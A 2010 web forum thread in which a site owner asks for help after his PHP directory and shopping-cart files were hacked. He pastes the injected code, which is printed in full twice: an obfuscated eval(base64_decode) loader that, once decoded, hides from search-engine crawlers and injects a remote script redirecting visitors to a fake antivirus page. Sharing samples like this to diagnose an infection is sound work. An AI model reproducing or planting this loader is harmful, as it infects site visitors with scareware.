my directory has been hacked.

mikimike · 08-22-2010

i found out my directory is hacked yesterday.
the hacker has added a line on top of all my php files and it took the visitors to another website and apparently trying to sell an anti virus to visitors...
i deleted all the encrypted lines from all php files and obviously doesn't work. i still have the same problem.

this line also was added to all my php files of shopping cart and also ecard service software.

can i just overwrite the original files of directory? is it going to solve the problem?

what do you suggest me to do?

thanks!

this is the code it was added:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5dWIzZHBjMmx6WkhWa1pYTmpZWEp6TG1O dmJTOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTsgICAgIC B9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBp ZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIG Z1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5Nk QwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7IC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFE OT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2Qk IwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2 QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2Qj E5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2Jyxz dWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZF QUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRD A3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5 MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNj ZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigk UjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpey AgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNE QUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MT FBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1 ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAg ICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRD k9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1 NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MT I4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJB QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0y OyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OU ExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNG MUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMD M3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09Rk FMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQT U2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFC OTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9IC AgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVF RjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LU VuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5Qj EyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihw cmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0 I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4g cHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJy xnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5 RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm 4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5n bWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKT sgICB9ICB9"));?>

TopWebNames · 08-22-2010

This is terrible! It's something that we all worry about, I'm sure!

Do you know how it was hacked, how they managed to gain access, etc.?

Good luck fixing it all, and keeping them out!

mikimike · 08-22-2010

I think the person hacked the server. unfortunately the hosting company i use is a very iresponsible one. i'm getting rid of them soon. they have no idea what is internet security. the hackers hack the server. they don't come after 1-2-3 websites. they hack a server with 200-300 websites. unfortunately mine was one of those....as you know UCSB is very well known in internet security around the world. i talked with them and they took a look at directory and said there is alot of security issues in it. i don't know. i have recieved updates from my shopping cart once in a while. the last one was this morning and my shopping cart problem is solved. i have never recieved any updates / upgrades for directory in last 4-5 years.

those crooks that hacked me will end up in prison sooner or later . as you know 10 of them went to jail in Germany few months ago.

does anybody know what should i do to solve the directory problem?
:-)

Alex B. · 08-25-2010

Hello!
We can clean up your directory from the dangerous code. Please create a ticket with your FTP details

Sai_dallas · 08-25-2010

until you move out of that server, there is no point in cleaning the site.

Use an old backup and move to a different hosting company.

08-22-2010	#1
mikimike Join Date: Dec 2006 Posts: 5	my directory has been hacked. i found out my directory is hacked yesterday. the hacker has added a line on top of all my php files and it took the visitors to another website and apparently trying to sell an anti virus to visitors... i deleted all the encrypted lines from all php files and obviously doesn't work. i still have the same problem. this line also was added to all my php files of shopping cart and also ecard service software. can i just overwrite the original files of directory? is it going to solve the problem? what do you suggest me to do? thanks! this is the code it was added: <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsg ICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl 9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9l eGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgIC AgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FH RU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVk VSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAg ICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y2 1NOUltaDBkSEE2THk5dWIzZHBjMmx6WkhWa1pYTmpZWEp6TG1O dmJTOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTsgICAgIC B9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBp ZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIG Z1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIz QzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5Nk QwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5 Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7IC AgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFE OT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2Qk IwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2 QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2Qj E5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2Jyxz dWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Nj g0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZF QUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRD A3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5 MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNj ZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigk UjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpey AgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNE QUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MT FBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1 ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzME IyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAg ICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRD k9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1 NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MT I4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJB QjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgIC AkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0y OyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OU ExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNG MUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMD M3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigk UjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09Rk FMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUEx ODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQT U2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFC OTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9IC AgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVF RjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LU VuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUy OEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5Qj EyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihw cmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0 I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4g cHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJy xnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5 RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm 4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5n bWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKT sgICB9ICB9"));?>

08-22-2010	#2
TopWebNames Join Date: May 2010 Location: Hawaii Posts: 731	This is terrible! It's something that we all worry about, I'm sure! Do you know how it was hacked, how they managed to gain access, etc.? Good luck fixing it all, and keeping them out! __________________ "The Best Of The Internet" - Premium, world class, paid only Internet directory - www.TheBestOfTheInternet.com High quality, intuitive phrase, type-in keyword, "Top Web Names" for sale - www.TopWebNames.com

08-25-2010	#4
Alex B. Tech Support Join Date: Oct 2008 Posts: 1,009	Hello! We can clean up your directory from the dangerous code. Please create a ticket with your FTP details __________________ Best Regards, Alex B. HELPDESK

08-25-2010	#5
Sai_dallas Join Date: Mar 2006 Location: USA Posts: 1,138	until you move out of that server, there is no point in cleaning the site. Use an old backup and move to a different hosting company. __________________ Dot Rig Ayhu eDoctor

Thread Tools
Show Printable Version Email this Page
Display Modes
Switch to Linear Mode Hybrid Mode Switch to Threaded Mode